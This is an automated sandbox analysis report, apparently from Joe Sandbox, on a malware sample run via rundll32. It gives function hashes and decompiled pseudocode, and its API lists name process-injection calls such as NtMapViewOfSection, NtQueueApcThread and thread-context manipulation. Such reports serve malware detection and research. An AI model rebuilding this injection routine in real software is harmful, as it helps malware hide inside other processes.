                                        • Opcode Fuzzy Hash: 26eb26508f00a0b5be9c6f34db07c1bcdd29cfda4e6fc5fd9407297f0d453823
                                        • Instruction Fuzzy Hash: 8F111B0322A3D88AD3038B7C590064D6EA8A376A947CDD696DAC5CB347C438D55AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304F293 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2029b59a4c444fe4c6c58784dc65606972c48091c1b91a45674541ba0b0d21b1
                                        • Instruction ID: d6cf6ef14fc6ca78a017590a539b2506a63d5084b3d0cb78bb81fd897e1f0556
                                        • Opcode Fuzzy Hash: 2029b59a4c444fe4c6c58784dc65606972c48091c1b91a45674541ba0b0d21b1
                                        • Instruction Fuzzy Hash: 5211ED0722A7D88ED3078B7C590054D6EA8E37A6983CEA296DBD4CB757C038D55AC373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE3F30 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4b4ca15e1c52f1109d84f796cb2a9d77310f2ab76d6906b281c9c887d29b203
                                        • Instruction ID: 8d907fe76a1bcdf41860c0f0589ec7fd81a1e5727b0663ac3c73adad4ae7d8c4
                                        • Opcode Fuzzy Hash: b4b4ca15e1c52f1109d84f796cb2a9d77310f2ab76d6906b281c9c887d29b203
                                        • Instruction Fuzzy Hash: CB018B73B388A04A03569B7EAC02A47B992A792771750EB60BF75CBFD4C238D9104F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3017C60 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e86f949cf0bcfe10732f01fa75e4687a9e7db4b82c29d1e8340628133e291e0f
                                        • Instruction ID: 8fd0319c26bb951a0646d32378aa17909c94f61236f0faf6ba8a99da8a011f1d
                                        • Opcode Fuzzy Hash: e86f949cf0bcfe10732f01fa75e4687a9e7db4b82c29d1e8340628133e291e0f
                                        • Instruction Fuzzy Hash: F911823362159486E74CCF76C965FED33A6F3D9304F46C21EEA160369ADA325A16CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3017BB0 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9546475e1d6630c97de7f844a6ea02cf953bcca35165af4bdc36e17a5dcdd0d0
                                        • Instruction ID: f9136ed562ec683575da085d4a4a28430d89c26e0cb6e772e0e589982710efe3
                                        • Opcode Fuzzy Hash: 9546475e1d6630c97de7f844a6ea02cf953bcca35165af4bdc36e17a5dcdd0d0
                                        • Instruction Fuzzy Hash: 1011657371150487EB8CDA79CC46ADE3392E3A8708F59C72ADA15C7786D638C547C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE4090 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bfa37e68459a4c776e5d1a501ae4ef2b0d0912e912c633c36e88c1f02373f0e
                                        • Instruction ID: 189efd70401bf8a7c06e9b1b98037c0b973713717965bf3232afefd022cf1223
                                        • Opcode Fuzzy Hash: 3bfa37e68459a4c776e5d1a501ae4ef2b0d0912e912c633c36e88c1f02373f0e
                                        • Instruction Fuzzy Hash: 2A017173B38960465350CB3EFC40A46B642A792770755EB50AF70A7ED4C238C8110F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3144530 Relevance: .0, Instructions: 36COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ca5967160483d4de5ff4c38f08cab94913b758e7f7304b8ef425bfdeb80f2c6
                                        • Instruction ID: fe851d170575bb75ed7c036c7e1a75165102bf0021aa66426457902acec69a46
                                        • Opcode Fuzzy Hash: 5ca5967160483d4de5ff4c38f08cab94913b758e7f7304b8ef425bfdeb80f2c6
                                        • Instruction Fuzzy Hash: 64F0BBBBC096C45BEEA68A289C6A29E6FF09373A10F5FC05589454B98BEC194C1AC211
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3144070 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e606231cd89ed15ed5f9f9afc63c7373d15b47af1cca05b91b87dbd95cfef46
                                        • Instruction ID: 57806fe7f272b1330573a5b0276cc18bee458921f75292d919ff8c4d5b1d224f
                                        • Opcode Fuzzy Hash: 4e606231cd89ed15ed5f9f9afc63c7373d15b47af1cca05b91b87dbd95cfef46
                                        • Instruction Fuzzy Hash: F5A002728085D190E7564D2868591D52A916336D48A099845C94007586C54A1479C612
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301C805 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 176memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Variant$Clear$String$_com_issue_error$FreeInit$Alloc
                                        • String ID: CreateFlags$ProcessId$ProcessStartupInformation$ReturnValue$ShowWindow
                                        • API String ID: 2067041508-2207766347
                                        • Opcode ID: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction ID: a00988c325bbc709178c8bbc6cc1707bcda6ec3811704cc400fd98b22df06ffb
                                        • Opcode Fuzzy Hash: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction Fuzzy Hash: B0812536200B4496EF10DF65E89839E77B0FB98B98F524416EE4E47B68DF38C55AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE7390 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 108libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 22%
                                        			E0000021E21EF2FE7390(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
				long long _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t35;
				void* _t49;
				void* _t50;
				void* _t51;
				long long* _t60;
				void* _t94;
				void* _t103;

				_t94 = __rdx;
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xf2fe73af;
				goto 0xf2fe73b2;
				_t103 = __r8;
				r15d =  *((intOrPtr*)(__r8 + 0x10));
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *__rax();
				 *__rax();
				if (__rcx == 0) goto 0xf2fe7544;
				_v56 = __r13;
				r13d = 0;
				_a8 = __r13;
				_a32 = __r13;
				_v72 = __r13;
				if (E0000021E21EF301BAE0(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0xf2fe74dc;
				_v64 = __r13;
				_a24 = __r13;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v80 = 0x40;
				_v88 = r13d;
				_v96 = 2;
				r9d = 0;
				_v104 =  &_v64;
				_t60 =  &_a24;
				_v112 = _t60;
				_v120 = __r13;
				_t35 =  *__rax();
				if ( *__rax() != 0) goto 0xf2fe74dc;
				r8d = r15d;
				E0000021E21EF310DC90(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
				if (_t94 == 0) goto 0xf2fe751f;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				r9d = 0;
				_v120 = r13d;
				r8d = 0;
				 *_t60();
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				return 1;
			}






















                                        0x21ef2fe73a2
                                        0x21ef2fe73a8
                                        0x21ef2fe73ad
                                        0x21ef2fe73af
                                        0x21ef2fe73b2
                                        0x21ef2fe73bd
                                        0x21ef2fe73d0
                                        0x21ef2fe73e3
                                        0x21ef2fe73ec
                                        0x21ef2fe73f0
                                        0x21ef2fe73f5
                                        0x21ef2fe73fb
                                        0x21ef2fe7408
                                        0x21ef2fe7416
                                        0x21ef2fe741e
                                        0x21ef2fe7426
                                        0x21ef2fe7432
                                        0x21ef2fe743f
                                        0x21ef2fe7444
                                        0x21ef2fe744c
                                        0x21ef2fe745f
                                        0x21ef2fe7472
                                        0x21ef2fe7485
                                        0x21ef2fe7490
                                        0x21ef2fe749a
                                        0x21ef2fe74a2
                                        0x21ef2fe74a5
                                        0x21ef2fe74ad
                                        0x21ef2fe74b5
                                        0x21ef2fe74ba
                                        0x21ef2fe74bf
                                        0x21ef2fe74c7
                                        0x21ef2fe74d1
                                        0x21ef2fe74d7
                                        0x21ef2fe74df
                                        0x21ef2fe74e8
                                        0x21ef2fe74fd
                                        0x21ef2fe7503
                                        0x21ef2fe7506
                                        0x21ef2fe750b
                                        0x21ef2fe7514
                                        0x21ef2fe7519
                                        0x21ef2fe7527
                                        0x21ef2fe7530
                                        0x21ef2fe7539
                                        0x21ef2fe7552

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Handle$AddressProc$Close$Module
                                        • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 2187694145-438560624
                                        • Opcode ID: 0f7f743a0d85d901ffeb3d5fa5ed4d3bc80856ae75f4b12be0242c3d0e15578b
                                        • Instruction ID: cab1a711ee811c17cf31033d9b256403da9e28b97377417e1efcf8d902834702
                                        • Opcode Fuzzy Hash: 0f7f743a0d85d901ffeb3d5fa5ed4d3bc80856ae75f4b12be0242c3d0e15578b
                                        • Instruction Fuzzy Hash: B4413B76204B8186EE609B12FC1879B67B5F7AAB95F464025DE8947B18EF3CC05AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEEF50 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 144synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0000021E21EF2FEEF50(long long __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, void* __r9) {
				void* __rsi;
				long _t40;
				long _t41;
				long _t42;
				long long _t63;
				long long _t64;
				int _t76;
				long long _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				struct _SECURITY_ATTRIBUTES* _t94;

				_t75 = __rdx;
				_t63 = __rax;
				 *((long long*)(_t85 + 8)) = __rbx;
				 *((long long*)(_t85 + 0x18)) = _t82;
				_t86 = _t85 - 0x40;
				r9d = 0;
				r14d = r8d;
				_t80 = __rdx;
				_t83 = __rcx;
				r8d = 0;
				CreateEventW(_t94, _t76);
				 *((long long*)(__rdx + 8)) = __rax;
				_t77 = __rax;
				if (__rax != 0) goto 0xf2feefb3;
				_t40 = GetLastError();
				 *((intOrPtr*)( *__rdx))();
				 *((intOrPtr*)(_t86 + 0x30)) = _t40;
				E0000021E21EF310D880(__rdx, __rdx);
				 *((long long*)(_t86 + 0x38)) = _t63;
				if (_t40 != 0) goto 0xf2fef0a1;
				r9d = 0;
				r8d = 0;
				CreateEventW(??, ??, ??, ??);
				 *((long long*)(_t83 + 0x10)) = _t63;
				 *((long long*)(__rdx + 0x10)) = _t63;
				if ( *((long long*)(_t83 + 0x10)) != 0) goto 0xf2fef000;
				_t41 = GetLastError();
				 *((intOrPtr*)( *__rdx))();
				 *((intOrPtr*)(_t86 + 0x30)) = _t41;
				E0000021E21EF310D880(__rdx, __rdx);
				 *((long long*)(_t86 + 0x38)) = _t63;
				if (_t41 != 0) goto 0xf2fef0b3;
				_t64 = _t86 + 0x68;
				 *((long long*)(_t86 + 0x28)) = _t64;
				 *((intOrPtr*)(_t86 + 0x20)) = 0;
				 *((intOrPtr*)(_t86 + 0x68)) = 0;
				E0000021E21EF3111DF0(0, r14d, _t64, __rbx, __rdx, __rdx, 0xf2fef0e0, __rdx);
				 *((long long*)(_t83 + 8)) = _t64;
				if (_t64 != 0) goto 0xf2fef074;
				_t42 = GetLastError();
				 *((intOrPtr*)( *_t80))();
				if (_t77 == 0) goto 0xf2fef053;
				CloseHandle(_t79);
				if ( *((intOrPtr*)(_t83 + 0x10)) == 0) goto 0xf2fef062;
				CloseHandle(??);
				 *((intOrPtr*)(_t86 + 0x30)) = _t42;
				E0000021E21EF310D880( *((intOrPtr*)(_t83 + 0x10)), _t75);
				 *((long long*)(_t86 + 0x38)) = _t64;
				if (_t42 != 0) goto 0xf2fef0c5;
				if (_t77 == 0) goto 0xf2fef08e;
				WaitForSingleObject(??, ??);
				return CloseHandle(??);
			}


















                                        0x21ef2feef50
                                        0x21ef2feef50
                                        0x21ef2feef50
                                        0x21ef2feef55
                                        0x21ef2feef5e
                                        0x21ef2feef62
                                        0x21ef2feef65
                                        0x21ef2feef68
                                        0x21ef2feef6b
                                        0x21ef2feef6e
                                        0x21ef2feef77
                                        0x21ef2feef7d
                                        0x21ef2feef81
                                        0x21ef2feef87
                                        0x21ef2feef98
                                        0x21ef2feef9a
                                        0x21ef2feef9d
                                        0x21ef2feefa1
                                        0x21ef2feefa6
                                        0x21ef2feefad
                                        0x21ef2feefb3
                                        0x21ef2feefb6
                                        0x21ef2feefbf
                                        0x21ef2feefc5
                                        0x21ef2feefc9
                                        0x21ef2feefd2
                                        0x21ef2feefe5
                                        0x21ef2feefe7
                                        0x21ef2feefea
                                        0x21ef2feefee
                                        0x21ef2feeff3
                                        0x21ef2feeffa
                                        0x21ef2fef002
                                        0x21ef2fef007
                                        0x21ef2fef016
                                        0x21ef2fef01d
                                        0x21ef2fef021
                                        0x21ef2fef026
                                        0x21ef2fef02d
                                        0x21ef2fef040
                                        0x21ef2fef042
                                        0x21ef2fef048
                                        0x21ef2fef04d
                                        0x21ef2fef05a
                                        0x21ef2fef05c
                                        0x21ef2fef062
                                        0x21ef2fef066
                                        0x21ef2fef06b
                                        0x21ef2fef072
                                        0x21ef2fef077
                                        0x21ef2fef07f
                                        0x21ef2fef0a0

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseErrorHandleLast$Create$Init_thread_footerObjectSingleSleepWait
                                        • String ID: thread$thread.entry_event$thread.exit_event
                                        • API String ID: 1744329276-3017686385
                                        • Opcode ID: eb338315c14347d22613674612ab0df602264c80eee5ef42f2649d6ee0591794
                                        • Instruction ID: a1c82228bd5f5088b8f08d083b4b264a98ec795ff665e7344a9fe43a7276bd01
                                        • Opcode Fuzzy Hash: eb338315c14347d22613674612ab0df602264c80eee5ef42f2649d6ee0591794
                                        • Instruction Fuzzy Hash: F8517A36214B4182EF159F65E88839A73B0F7A4B90F128625EF5A03FA9EF7CC056C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B3F0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 47libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: ZwAllocateVirtualMemory$ZwGetContextThread$ZwReadVirtualMemory$ZwSetContextThread$ZwWriteVirtualMemory$ntdll.dll
                                        • API String ID: 667068680-1731939869
                                        • Opcode ID: e028038f595151421b2040325bb29b6033f210ddb9d79b46612d08f833186a58
                                        • Instruction ID: 6aa95faec8005985c0d7a98fed67a8ce6205b5f8905746ef9b1805e044cf0cb3
                                        • Opcode Fuzzy Hash: e028038f595151421b2040325bb29b6033f210ddb9d79b46612d08f833186a58
                                        • Instruction Fuzzy Hash: 33110A74205F4081FE15DB15EC983AA23F1BB79B90F8A9025CC0E02F65EF2CD45AC310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FFD730 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E0000021E21EF2FFD730(signed int __edx, short __esi, signed char* __rbx, long long __rcx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				signed int _t90;
				signed int _t91;
				void* _t107;
				void* _t115;
				short _t116;
				void* _t117;
				void* _t134;
				long long _t148;
				void* _t149;
				signed char* _t152;
				long long _t155;
				signed char* _t171;
				signed char* _t172;
				signed long long _t175;
				signed int _t176;
				long long _t177;
				void* _t190;
				signed char* _t191;
				void* _t195;
				void* _t197;
				void* _t200;
				void* _t203;
				void* _t205;
				void* _t206;
				signed char* _t209;
				void* _t211;
				void* _t213;

				_t211 = __r9;
				_t152 = __rbx;
				_t116 = __esi;
				_t134 = _t205;
				 *((long long*)(_t134 + 8)) = __rcx;
				_t203 = _t134 - 0x48;
				_t206 = _t205 - 0x130;
				 *((long long*)(_t206 + 0x50)) = 0xfffffffe;
				 *((long long*)(_t134 + 0x10)) = __rbx;
				 *((long long*)(_t134 + 0x20)) = __rsi;
				_t196 = __r9;
				_t200 = __r8;
				r14d = __edx & 0x0000ffff;
				if ( *((intOrPtr*)(__r8 + 8)) + 2 - 0xffff <= 0) goto 0xf2ffd81e;
				 *((long long*)(_t206 + 0x30)) = 0xf319d200;
				 *((long long*)(_t206 + 0x38)) = 0xf319d200;
				 *((long long*)(_t206 + 0x40)) = 0xf319d200;
				 *(_t206 + 0x20) = "field name too large";
				 *(_t206 + 0x28) = 1;
				E0000021E21EF310E0E4(__rbx, _t206 + 0x20, _t206 + 0x38, __r9, __r8);
				 *((long long*)(_t206 + 0x30)) = 0xf319d240;
				 *((long long*)(_t206 + 0x30)) = 0xf319d270;
				E0000021E21EF2FFE350(_t152, _t203 - 0x50, _t206 + 0x30);
				 *0x21EF319D298 = "class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/fields.ipp";
				 *0x21EF319D2A8 = 0x47a;
				E0000021E21EF30012E0(0xf319d270, _t203 - 0x10);
				E0000021E21EF3001320(_t107, _t152, _t206 + 0x58, 0xf319d270, _t200);
				E0000021E21EF31103EC(_t152, _t206 + 0x58, 0xf31e4b98, _t200, _t213);
				if ( *((intOrPtr*)(_t211 + 8)) + 2 - 0xffff <= 0) goto 0xf2ffd8db;
				 *((long long*)(_t206 + 0x30)) = 0xf319d200;
				 *((long long*)(_t206 + 0x38)) = 0xf319d200;
				 *((long long*)(_t206 + 0x40)) = 0xf319d200;
				 *(_t206 + 0x20) = "field value too large";
				 *(_t206 + 0x28) = 1;
				E0000021E21EF310E0E4(_t152, _t206 + 0x20, _t206 + 0x38, _t196, _t200);
				 *((long long*)(_t206 + 0x30)) = 0xf319d240;
				 *((long long*)(_t206 + 0x30)) = 0xf319d270;
				E0000021E21EF2FFE350(_t152, _t203 - 0x10, _t206 + 0x30);
				 *((long long*)(0x21ef319d298)) = "class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char> >,class boost::basic_string_view<char,struct std::char_traits<char> >)";
				 *((long long*)(0x21ef319d2a0)) = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/fields.ipp";
				 *((intOrPtr*)(0x21ef319d2a8)) = 0x47e;
				E0000021E21EF30012E0(0xf319d270, _t203 - 0x50);
				E0000021E21EF3001320(_t107, _t152, _t206 + 0x58, 0xf319d270, _t200);
				_t171 = _t206 + 0x58;
				E0000021E21EF31103EC(_t152, _t171, 0xf31e4b98, _t200, _t195);
				asm("inc ecx");
				asm("dec ax");
				asm("psrldq xmm0, 0x8");
				asm("dec ax");
				_t190 = 0xf319d270 + _t171;
				if (_t171 == _t190) goto 0xf2ffd93a;
				_t90 =  *_t171 & 0x000000ff;
				if (_t90 == 0x20) goto 0xf2ffd904;
				if (_t90 != 9) goto 0xf2ffd909;
				_t172 =  &(_t171[1]);
				goto 0xf2ffd8f4;
				if (_t172 == _t190) goto 0xf2ffd93a;
				_t209 = _t190 - 1;
				_t91 =  *_t209 & 0x000000ff;
				if (_t91 == 0x20) goto 0xf2ffd91e;
				if (_t91 != 9) goto 0xf2ffd926;
				_t191 = _t209;
				goto 0xf2ffd90c;
				if (_t172 == _t191) goto 0xf2ffd93a;
				 *(_t206 + 0x20) = _t172;
				 *(_t206 + 0x28) = _t191 - _t172;
				goto 0xf2ffd944;
				 *(_t206 + 0x20) = _t152;
				 *(_t206 + 0x28) = _t152;
				asm("movups xmm0, [esp+0x20]");
				asm("inc ecx");
				_t175 =  &(( &(_t172[0x41]))[ *((intOrPtr*)(_t200 + 8))]) >> 3;
				if (_t175 == 0) goto 0xf2ffd9ab;
				_t176 = _t175 * 8;
				if (_t176 - 0x1000 < 0) goto 0xf2ffd9a3;
				_t148 = _t176 + 0x27;
				if (_t148 - _t176 > 0) goto 0xf2ffd98d;
				E0000021E21EF310A170(_t148);
				asm("int3");
				_t177 = _t148;
				E0000021E21EF310B674(_t148, _t177);
				_t52 = _t148 + 0x27; // 0x27
				 *((long long*)((_t52 & 0xffffffe0) - 8)) = _t148;
				goto 0xf2ffd9ab;
				E0000021E21EF310B674(_t148, _t177);
				_t155 = _t148;
				 *((long long*)(_t203 + 0x50)) = _t155;
				 *((long long*)(_t203 + 0x60)) = _t155;
				if (_t155 == 0) goto 0xf2ffda58;
				asm("movups xmm1, [edi]");
				asm("movaps [esp+0x30], xmm1");
				asm("movups xmm0, [esi]");
				asm("movaps [esp+0x20], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				 *(_t155 + 0x30) =  &(_t209[2]) & 0x0000ffff;
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				 *((short*)(_t155 + 0x32)) = _t116;
				 *((intOrPtr*)(_t155 + 0x34)) = r14w;
				_t60 = _t155 + 0x38; // 0x38
				_t197 = _t60;
				 *((char*)(_t148 + _t197)) = 0x3a;
				 *((char*)(_t148 + _t197)) = 0x20;
				_t149 = _t148 + _t197;
				 *((char*)(_t177 + _t149)) = 0xd;
				 *((char*)(_t177 + _t149 + _t197 + 1)) = 0xa;
				if (_t209 == 0) goto 0xf2ffda3e;
				E0000021E21EF310DC90( *(_t155 + 0x30) & 0x0000ffff, _t115, _t116, _t117, _t197,  *(_t206 + 0x20), _t197, _t200, _t209);
				if (_t200 == 0) goto 0xf2ffda58;
				return E0000021E21EF310DC90( *(_t155 + 0x30) & 0x0000ffff, _t115, _t116, _t117, _t197 + _t197,  *((intOrPtr*)(_t206 + 0x30)), _t197, _t200, _t200);
			}































                                        0x21ef2ffd730
                                        0x21ef2ffd730
                                        0x21ef2ffd730
                                        0x21ef2ffd730
                                        0x21ef2ffd733
                                        0x21ef2ffd73b
                                        0x21ef2ffd73f
                                        0x21ef2ffd746
                                        0x21ef2ffd74f
                                        0x21ef2ffd753
                                        0x21ef2ffd757
                                        0x21ef2ffd75a
                                        0x21ef2ffd75d
                                        0x21ef2ffd76f
                                        0x21ef2ffd77c
                                        0x21ef2ffd783
                                        0x21ef2ffd788
                                        0x21ef2ffd794
                                        0x21ef2ffd799
                                        0x21ef2ffd7a8
                                        0x21ef2ffd7b5
                                        0x21ef2ffd7c1
                                        0x21ef2ffd7cf
                                        0x21ef2ffd7dc
                                        0x21ef2ffd7e7
                                        0x21ef2ffd7eb
                                        0x21ef2ffd7f9
                                        0x21ef2ffd807
                                        0x21ef2ffd818
                                        0x21ef2ffd82c
                                        0x21ef2ffd839
                                        0x21ef2ffd840
                                        0x21ef2ffd845
                                        0x21ef2ffd851
                                        0x21ef2ffd856
                                        0x21ef2ffd865
                                        0x21ef2ffd872
                                        0x21ef2ffd87e
                                        0x21ef2ffd88c
                                        0x21ef2ffd899
                                        0x21ef2ffd8a4
                                        0x21ef2ffd8a8
                                        0x21ef2ffd8b6
                                        0x21ef2ffd8c4
                                        0x21ef2ffd8d0
                                        0x21ef2ffd8d5
                                        0x21ef2ffd8db
                                        0x21ef2ffd8df
                                        0x21ef2ffd8e4
                                        0x21ef2ffd8e9
                                        0x21ef2ffd8ee
                                        0x21ef2ffd8f7
                                        0x21ef2ffd8f9
                                        0x21ef2ffd8fe
                                        0x21ef2ffd902
                                        0x21ef2ffd904
                                        0x21ef2ffd907
                                        0x21ef2ffd90c
                                        0x21ef2ffd90e
                                        0x21ef2ffd912
                                        0x21ef2ffd918
                                        0x21ef2ffd91c
                                        0x21ef2ffd91e
                                        0x21ef2ffd924
                                        0x21ef2ffd929
                                        0x21ef2ffd92e
                                        0x21ef2ffd933
                                        0x21ef2ffd938
                                        0x21ef2ffd93a
                                        0x21ef2ffd93f
                                        0x21ef2ffd944
                                        0x21ef2ffd949
                                        0x21ef2ffd964
                                        0x21ef2ffd96b
                                        0x21ef2ffd96d
                                        0x21ef2ffd97c
                                        0x21ef2ffd97e
                                        0x21ef2ffd985
                                        0x21ef2ffd987
                                        0x21ef2ffd98c
                                        0x21ef2ffd98d
                                        0x21ef2ffd990
                                        0x21ef2ffd995
                                        0x21ef2ffd99d
                                        0x21ef2ffd9a1
                                        0x21ef2ffd9a3
                                        0x21ef2ffd9a8
                                        0x21ef2ffd9ab
                                        0x21ef2ffd9af
                                        0x21ef2ffd9b6
                                        0x21ef2ffd9bc
                                        0x21ef2ffd9bf
                                        0x21ef2ffd9c4
                                        0x21ef2ffd9c7
                                        0x21ef2ffd9cc
                                        0x21ef2ffd9d1
                                        0x21ef2ffd9dd
                                        0x21ef2ffd9e1
                                        0x21ef2ffd9e6
                                        0x21ef2ffd9eb
                                        0x21ef2ffd9ef
                                        0x21ef2ffd9f4
                                        0x21ef2ffd9f4
                                        0x21ef2ffd9fd
                                        0x21ef2ffda09
                                        0x21ef2ffda15
                                        0x21ef2ffda18
                                        0x21ef2ffda27
                                        0x21ef2ffda2f
                                        0x21ef2ffda39
